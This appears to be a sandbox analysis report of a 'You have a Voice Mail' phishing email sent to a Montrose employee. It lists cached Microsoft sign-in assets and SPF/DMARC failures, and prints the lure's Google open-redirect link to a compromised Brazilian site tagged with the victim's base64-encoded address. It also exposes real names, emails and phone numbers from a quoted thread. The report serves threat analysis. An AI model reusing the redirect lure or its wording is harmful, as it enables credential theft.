                                                                SHA-256:EDEF72AC444C19F9387816DC0F6A5CF0D074E0B25639375306CA79B36BF32FC8
                                                                SHA-512:E2B497F4B2CCC9FE6AC67EDD32466C4EA31B80CA192B192B1744A0B2B4FE918E17C52F75BCE4F08395D49120A90BDDE471B239B40E07EE3430960AC25D1605B8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e31e7aafcda144b/1731701641045/-bGdmoW2_wt1SdQ
                                                                Preview:.PNG........IHDR...O...N........t....IDAT.....$.....IEND.B`.

                                                                Chrome Cache Entry: 167

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:downloaded
                                                                Size (bytes):2672
                                                                Entropy (8bit):6.640973516071413
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..

                                                                Chrome Cache Entry: 168

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:1

                                                                Chrome Cache Entry: 170

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):563851
                                                                Entropy (8bit):5.221453271093944
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:12DD1E4D0485A80184B36D158018DE81
                                                                SHA1:EB2594062E90E3DCD5127679F9C369D3BF39D61C
                                                                SHA-256:A04B5B8B345E79987621008E6CC9BEF2B684663F9A820A0C7460E727A2A4DDC3
                                                                SHA-512:F3A92BF0C681E6D2198970F43B966ABDF8CCBFF3F9BD5136A1CA911747369C49F8C36C69A7E98E0F2AED3163D9D1C5D44EFCE67A178DE479196845721219E12C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css
                                                                Preview:@charset "UTF-8";/*! @ms-mwf/mwf - v1.25.0+6321934 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css *

                                                                Chrome Cache Entry: 171

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format, TrueType, length 26288, version 0.0
                                                                Category:downloaded
                                                                Size (bytes):26288
                                                                Entropy (8bit):7.984195877171481
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D0263DC03BE4C393A90BDA733C57D6DB
                                                                SHA1:8A032B6DEAB53A33234C735133B48518F8643B92
                                                                SHA-256:22B4DF5C33045B645CAFA45B04685F4752E471A2E933BFF5BF14324D87DEEE12
                                                                SHA-512:9511BEF269AE0797ADDF4CD6F2FEC4AD0C4A4E06B3E5BF6138C7678A203022AC4818C7D446D154594504C947DA3061030E82472D2708149C0709B1A070FDD0E3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff
                                                                Preview:wOFF......f........D........................OS/2...X...H...`JM.FVDMX.............^.qcmap.............*.9cvt ...4... ...*....fpgm...T.......Y...gasp...D............glyf...P..U5.......head..]....2...6...Chhea..]........$$...hmtx..]..........ye'loca..^............Gmaxp..`.... ... ./..name..`....8....]..Rpost..f........ .Q.wprep..f$........x...x.c`.Pf......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...-.Wx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...mL.U.............9.x.`[...&BF@X...V.h.Z..h......`n....[..U

                                                                Chrome Cache Entry: 173

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                Category:dropped
                                                                Size (bytes):673
                                                                Entropy (8bit):7.6596900876595075
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:0E176276362B94279A4492511BFCBD98
                                                                SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...

                                                                Chrome Cache Entry: 174

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                Category:downloaded
                                                                Size (bytes):3620
                                                                Entropy (8bit):6.867828878374734
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                                Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...

                                                                Chrome Cache Entry: 175

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text
                                                                Category:downloaded
                                                                Size (bytes):315
                                                                Entropy (8bit):5.0572271090563765
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:http://condominioanacarolina.com.br/favicon.ico
                                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

                                                                Chrome Cache Entry: 177

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                Category:downloaded
                                                                Size (bytes):167730
                                                                Entropy (8bit):5.045981547409661
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AFB5C64B13342F6E568093548D0A2A9F
                                                                SHA1:95FC121CCCFDBA12443CF87A9C823486065A14AB
                                                                SHA-256:238DB52476BF8107E2E851CD3299B071ED5944B570C1603A1EA758A4FADF5F29
                                                                SHA-512:6FE8BADD1B94E81464C0808383A4CC77F779BF226A3C13B58B2BCB36332995EFBC7711373EE8AB2A8BC52675884F9885D168CB2DE9535E39E71B0B72940691E1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/onerfstatics/marketingsites-wcus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/2b-7ae144/7e-3283eb/69-8122fc/86-016699/72-2b1d8c/80-6461e7/2a-d9be59/51-40faf7?ver=2.0
                                                                Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh

                                                                Chrome Cache Entry: 178

                                                                Download File
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 33 x 76, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):4.014960565232003
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FE245F849186FA0ED4DB94617B46FE0A
                                                                SHA1:58A615ABE638C7AD79C49DD114A7261D9920C13B
                                                                SHA-256:B1931DBA22C99A20E6A147F712E61B3BB0E9C2A1C4AF661E65BA5098934FB146
                                                                SHA-512:C0F584A1A60C3C47D9D75CAB27808D96F5E8EDC261A79302F7127D01940F49D42D144D1117FF24ABB80C6F5A87FA7BD90A67284060C4B1F98FCF70B09ED708ED
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR...!...L.....l.I.....IDAT.....$.....IEND.B`.

                                                                Static File Info

                                                                General

                                                                File type:ASCII text, with very long lines (676), with CRLF, LF line terminators
                                                                Entropy (8bit):6.197036035947996
                                                                TrID:
                                                                • Standard Unix Mailbox (42005/1) 100.00%
                                                                File name:ee0b6b037b16b54632b6b37d1fb72727.eml
                                                                File size:205'664 bytes
                                                                MD5:4b9e5facdef9a6a766716ef1a494d15c
                                                                SHA1:c7df5078fe1808cc06078c8d2629835732e97dc9
                                                                SHA256:4d156810843e3438e761c4f3cbfecaccd29c4b64b2ea6aa73e54aed5283cf120
                                                                SHA512:81797d3724bc07bb3f3574cd394b65ac23e5369b6b1ba30d87165f714c6f243d760ed33730c2c61d7e695e79df6bee38792babd31a7fa6baab10efce7187c150
                                                                SSDEEP:6144:bdksZIfYsEZkRwDKZwaGLiAKWtr/rySq2LUDS29666r:bdksZIfYsghiAdrTnb4u
                                                                TLSH:3F147D47EDD50E71CC9A20EC2C07776F3A7808EBD927AC70AAEE765F090ECD9914A115
                                                                File Content Preview:From nobody Fri Nov 15 20:07:29 2024.X-MS-Exchange-Organization-InternalOrgSender: False.ARC-Seal: i=2; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=pass;. b=j2MTXz0IzWT6fasm+8qIFRZ7dBxhFmhrnMhSjj3RALCXLY48luWDS7/1CRl45ROjSbFj6m/ltNFYrIRC97oSYaeJ

                                                                Static Mail

                                                                General

                                                                Subject:[External] - MONTROSE-ENV: You have a Voice Mail (if)
                                                                From:"Audio.calls" <rbeuk@generous-minds.com>
                                                                To:kelly.swanson@montrose-env.com
                                                                Cc:
                                                                BCC:
                                                                Date:Fri, 15 Nov 2024 17:21:09 -0800
                                                                Communications:
                                                                • You don't often get email from rbeuk@generous-minds.com. Learn why this is important<https://aka.ms/LearnAboutSenderIdentification> <https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t> [cid:C91B23753AA0697700D1@WINCLJBGQJP] 54054 Yes Have not received estimate. Thanks Cyndi. Thank you, John M Herrmann SERVICE MANAGER Hill Idealease, LLC 740-633-3011(Office) 724-531-1195(Cell) 740-633-2140(Fax) ------------------
                                                                • From: Cyndi Matvya <cmatvya@shamrockutilitytrailer.com> Sent: Wednesday, May 3, 2023 11:13 AM To: John Herrmann <jherrmann@hillidealease.com> Cc: Richard Reuille <rreuille@hillidealease.com>; Lisa Zwiesler <lzwiesler@hillidealease.com> Subject: RE: IDEALEASE 322913 / 321806 Unit 321806 is in the shop. Unit #322913 Did you ever get a quote for this one, I seen it was started but looks like the parts were put on, I will have them get this done ASAP. Thank you ~ and make it a great day. Cyndi Matvya Service Administrator & Accounts Receivable Shamrock Utility Trailers, Inc 500 North Center Avenue, New Stanton, PA 15672<500%20North%20Center%20Avenue,%20New%20Stanton,%20PA%20%2015672> 724-925-9200 724-925-6999 FAX
                                                                • From: John Herrmann <jherrmann@hillidealease.com<mailto:jherrmann@hillidealease.com>> Sent: Wednesday, May 3, 2023 10:53 AM To: Cyndi Matvya <cmatvya@shamrockutilitytrailer.com<mailto:cmatvya@shamrockutilitytrailer.com>> Cc: Richard Reuille <rreuille@hillidealease.com<mailto:rreuille@hillidealease.com>>; Lisa Zwiesler <lzwiesler@hillidealease.com<mailto:lzwiesler@hillidealease.com>> Subject: IDEALEASE 322913 / 321806 Good morning Cyndi I wanted to check and see the status of the units 322913 and 321806 we have there for box repairs. Thank you, John M Herrmann SERVICE MANAGER Hill Idealease, LLC <span ________________________________ CONFIDENTIALITY NOTICE: The contents of this email message and any attachments are intended solely for the addressee(s) and may contain confidential, proprietary and/or privileged information and may be legally protected from disclosure. If you are not the intended recipient of this message or their agent, or if this message has been addressed to you in error, please immediately alert the sender by reply email and then delete this message and any attachments and the reply from your system. If you are not the intended recipient, you are hereby notified that any disclosure, use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.
                                                                Attachments:
                                                                • ilil.pdf

                                                                Headers

                                                                Key Value
                                                                X-MS-Exchange-Organization-InternalOrgSenderFalse
                                                                ARC-Seali=1; a=rsa-sha256; s=arcselector10001; d=microsoft.com; cv=none; b=Aw0bxXWPzNzW59z/62NmJhlaMr3lbWtk4Q7QLROefbauqa8gvKTCExft349e+drI0AcES12h11zO7q4nm3PIrnCrkaMAW0ioiRS3y1kJJiYG5A2CXs3WiWadsgSIGCSHrOn7XYsBXqPbQOvo1U3fz0uoh2GheKADimGCUeTh6ni1qoS3VtyF1SfHotSpJ6WUGIS05VnnIGhQWjMpN0DJz4rkVfRDiE4FzX2Y7IRiwsnN3tqaWC3X9f4e0RzBTOBsaqtmUs4WZpFSF8vwtGjh4PPabUoF+CQiv21sO4+Ml77vYRyDi9KdJB/GuXPmohUD1Gk96pL9FTXHMOQPw3sg0A==
                                                                ARC-Message-Signaturei=1; a=rsa-sha256; c=relaxed/relaxed; d=microsoft.com; s=arcselector10001; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-AntiSpam-MessageData-ChunkCount:X-MS-Exchange-AntiSpam-MessageData-0:X-MS-Exchange-AntiSpam-MessageData-1; bh=Y5V/xx3CJ3ZeC+Yb2J4fKYGaIfNyA44lj4+dHdJz7r8=; b=vbv+x/5vZSDCVV8yiN2Sx7B/nPDi8+XlznHeg2P2WBJDyXezHBpwCOO8Ae2tw8GVOxzKOn3mvdtCj18YLHIcYyU8kCEFr+XbvNiYP2AyW3h2NBy5Sf9WRThytlYdPUPVHiUKKiG+QciHWiiDBgX0wCWsH9a/gHibGCMIp2dDf50grKsNz8XwVAWMayC8NTOojehBMqskqsODZI43S3tQwT0QTbMw1er9ud7FCm3UDlEB6NZg6UAILf1alFL8D52RpeV9Tf4AUie0DeyoPotmnjGgHZFKjjiImuEhBvaPWKBDucDgLWC8zdsoFIbfdTazpnlJ6Wh0ATGTjC71vV2pdg==
                                                                ARC-Authentication-Resultsi=1; mx.microsoft.com 1; spf=fail (sender ip is 173.195.100.199) smtp.rcpttodomain=montrose-env.com smtp.mailfrom=generous-minds.com; dmarc=fail (p=none sp=none pct=100) action=none header.from=generous-minds.com; dkim=none (message not signed); arc=none (0)
                                                                Receivedfrom cloudfare.com (173.195.100.199) by DU6PEPF0000B621.mail.protection.outlook.com (10.167.8.138) with Microsoft SMTP Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.8158.14 via Frontend Transport; Fri, 15 Nov 2024 18:28:20 +0000
                                                                Authentication-Resultsspf=pass (sender IP is 40.107.247.116) smtp.mailfrom=generous-minds.com; dkim=pass (signature was verified) header.d=generousminds.onmicrosoft.com;dmarc=pass action=none header.from=generous-minds.com;compauth=pass reason=100
                                                                Received-SPFFail (protection.outlook.com: domain of generous-minds.com does not designate 173.195.100.199 as permitted sender) receiver=protection.outlook.com; client-ip=173.195.100.199; helo=cloudfare.com;
                                                                DKIM-Signaturev=1; a=rsa-sha256; c=relaxed/relaxed; d=generousminds.onmicrosoft.com; s=selector2-generousminds-onmicrosoft-com; h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-SenderADCheck; bh=Y5V/xx3CJ3ZeC+Yb2J4fKYGaIfNyA44lj4+dHdJz7r8=; b=tTpqZ0r+yE9jZ7xccQ5ibSJD8YX6FXtQjb619+4iurrw+TgBN+dnivlDkvCwtGx3lm3L7sr23W1HQKr+oEtkWpEMayc1eIIcxe6RLPifVH1Cio4YHHXUt0nBspAsf6H7enWk318G/Cf8/V/q0hlMH6oAwfjkqf3BZRZnh5OF2mU=
                                                                X-MS-Exchange-Authentication-Resultsspf=fail (sender IP is 173.195.100.199) smtp.mailfrom=generous-minds.com; dkim=none (message not signed) header.d=none;dmarc=fail action=none header.from=generous-minds.com;
                                                                From"Audio.calls" <rbeuk@generous-minds.com>
                                                                Subject[External] - MONTROSE-ENV: You have a Voice Mail (if)
                                                                Tokelly.swanson@montrose-env.com
                                                                Content-Typemultipart/mixed; boundary="_19228eef-c57b-4190-9c5a-8b946159626b_"
                                                                MIME-Version1.0
                                                                DateFri, 15 Nov 2024 17:21:09 -0800
                                                                Message-ID<1509202411211767EE169487-4AE9380373@generous-minds.com>
                                                                X-MailerOutlook Express 6.00.2900.2527
                                                                Return-Pathrbeuk@generous-minds.com
                                                                X-EOPAttributedMessage1
                                                                X-MS-TrafficTypeDiagnosticDU6PEPF0000B621:EE_|PA4PR08MB5952:EE_|SA2PEPF00002251:EE_|SJ0PR09MB11746:EE_
                                                                X-MS-Office365-Filtering-Correlation-Idfc02e381-59d2-4bbd-595d-08dd05a35233
                                                                X-MS-Exchange-SenderADCheck1
                                                                X-MS-Exchange-AntiSpam-Relay0
                                                                X-Microsoft-Antispam-UntrustedBCL:0; ARA:13230040|376014|82310400026|1800799024|36860700013|34020700016|4076899003|8096899003;
                                                                X-Microsoft-Antispam-Message-Info-OriginalE5AO3V30IcLJE56eFr3q3ZOsA0BlgJ7ypn/g0hgVwNsKEG19ZipcDrUEpMJxMHW3PneovS3KmcvzCnXhaQONKgxQCSClDyJTv2kmVzCc7sMpSHPJ+bosqPR3IxvGnViKZ79rOme7G9TFTKWxZonYVv1haPjw+Qc9vogmB6a4wzm3H3mGdyN98QL22r28OkZ7TJosf3bIj75J3GV4PMDHxgXgPgPN1EAd6IEYBWUJ3uH2MmW58mdysZFRxpoHxyX4frB13x2d5GvdDUUxlCLp+6HVtiwhjPNTQhzMANbc2Ka2k3PXJwjLIXtAVJU9MxjNqZpEN5lQ/hyI3QBvv2d7OvJtjNQ9Z89PHN2HCzt3wgbyOB6pK7ctytZ4Pj1Ep1FgBxQSP3YJa8Ddr/fq5p/or/JBuEve2jDYr6V2gL8eSzYSMeN8wRIYpiENtJy0zqGwnignoMYfnTwYml4vebN2O0VIIWADSRm/4x5gEHnUFWGkBYiB0CtA6fXWLCTm++njSabduHjNIJtYKIDQjh6M/rqzg4xfhVMdsZqxXbATS1u1Q7FUCb1n7CI+Almb7kxODbp1sGTHy0TXDGPMDz7FkuxyABRkp+if7pEa1uqENqruPn2LI2jid1Xu0Xfm6uJ6UmZ6KoeQNW3ahbIfrSdOtX5pmHPi9YbOp0cKfqhshD0YByy0ssPx+ARGOqIQ9UYJWDlwwS+Y7uLD3sBHhSNrWekU66IETdKVggY2tRfYf6s6tU5IMR61GA+CR60b2kaWj/SYm6+jQH+1UM8Lat5pxytD/F32bEKZQuxTRnigHZ/c6EVu7d6V6taYZCqDz3HIEgY3tv5vvwdnMjK7cnu5CA2ocqM9JPIoNOHC3GB/VNXkGPAO7DbKfITU3YapkEskrdb6LbgdhKbOoDVlUpPWvlqKZRxQiS9E8mFAwUwdJfhQDz+VaPZAp+KF6KtlthoV+d+etYW+Ki2bZS2nPGAza+iPniiwasFXox4v3B7m/3J2pglEgL4Q0O79fNTkXhvO0ripHY69BO/hiCrJPi99jdOZS7tM03u801seidY3KPHKArEhMr7viZVSxuUFvjtWjetKlQB/0OASaKcqkZeASFyXMbLYkEuZsC8BBTHnzfeanb51XQFMz3cL8H/aw6whDGURmP6qIoPAnCb7UP/0UjW+cBVe8rTQjNiQvl81pamlhG/0pqI6R3TecLIvLyROJgzgzspicSiboZwMHbShgoH6035X9iJH4mPGAn3QbPmbTXp4jgk9Dd/IvK4wz9fUXgNdb3YizOgszAg9Dxeu6jTHTk7lNO4IKcSYhlTBlHvAmpjHBcQ7vBXx7e6DeY8eNjUK2X7DqwyK8Me6qXEHsA==
                                                                X-Forefront-Antispam-Report-UntrustedCIP:173.195.100.199; CTRY:US; LANG:en; SCL:1; SRV:; IPV:NLI; SFV:NSPM; H:cloudfare.com; PTR:InfoDomainNonexistent; CAT:NONE; SFS:(13230040)(376014)(82310400026)(1800799024)(36860700013)(34020700016)(4076899003)(8096899003); DIR:OUT; SFP:1102;
                                                                X-MS-Exchange-Transport-CrossTenantHeadersStampedPA4PR08MB5952
                                                                X-MS-Exchange-Organization-OriginalArrivalTime15 Nov 2024 18:28:37.0727 (UTC)
                                                                X-MS-Exchange-Organization-ExpirationStartTime15 Nov 2024 18:28:37.3383 (UTC)
                                                                X-MS-Exchange-Organization-ExpirationStartTimeReasonOriginalSubmit
                                                                X-MS-Exchange-Organization-ExpirationInterval1:00:00:00.0000000
                                                                X-MS-Exchange-Organization-ExpirationIntervalReasonOriginalSubmit
                                                                X-MS-Exchange-Organization-Network-Message-Idfc02e381-59d2-4bbd-595d-08dd05a35233
                                                                X-MS-Exchange-Organization-OriginalClientIPAddress40.107.247.116
                                                                X-MS-Exchange-Organization-OriginalServerIPAddress10.167.242.133
                                                                X-EOPTenantAttributedMessage726003d6-df89-4f29-896a-515cf07df7dc:0
                                                                X-MS-Exchange-Organization-TargetResourceForestnamprd09.prod.outlook.com
                                                                X-MS-Exchange-Organization-OrgEopForestGCC02
                                                                X-MS-Exchange-Organization-MessageDirectionalityIncoming
                                                                X-MS-Exchange-Organization-Id726003d6-df89-4f29-896a-515cf07df7dc
                                                                X-MS-Exchange-Organization-FFO-ServiceTagGCC02B
                                                                X-MS-Exchange-Organization-TenantServiceProviderFOPE
                                                                X-MS-Exchange-Organization-Cross-Premises-Headers-ProcessedSA2PEPF00002251.namprd09.prod.outlook.com
                                                                X-MS-Exchange-Organization-OriginalTenant-OriginalArrivalTime15 Nov 2024 18:28:20.6196 (UTC)
                                                                X-MS-Exchange-Organization-OriginalTenant-Network-Message-Id2a2328df-bdc3-4a84-7f0c-08dd05a34875
                                                                X-MS-Exchange-Organization-OriginalTenant-Id3672ec2f-700d-42a5-8329-71f66235757e
                                                                X-MS-Exchange-Organization-OriginalAttributedTenantConnectingIpTenantId=3672ec2f-700d-42a5-8329-71f66235757e; Ip=[173.195.100.199]; Helo=[cloudfare.com]
                                                                X-MS-Exchange-Organization-OriginalTenant-AuthSourceDU6PEPF0000B621.eurprd02.prod.outlook.com
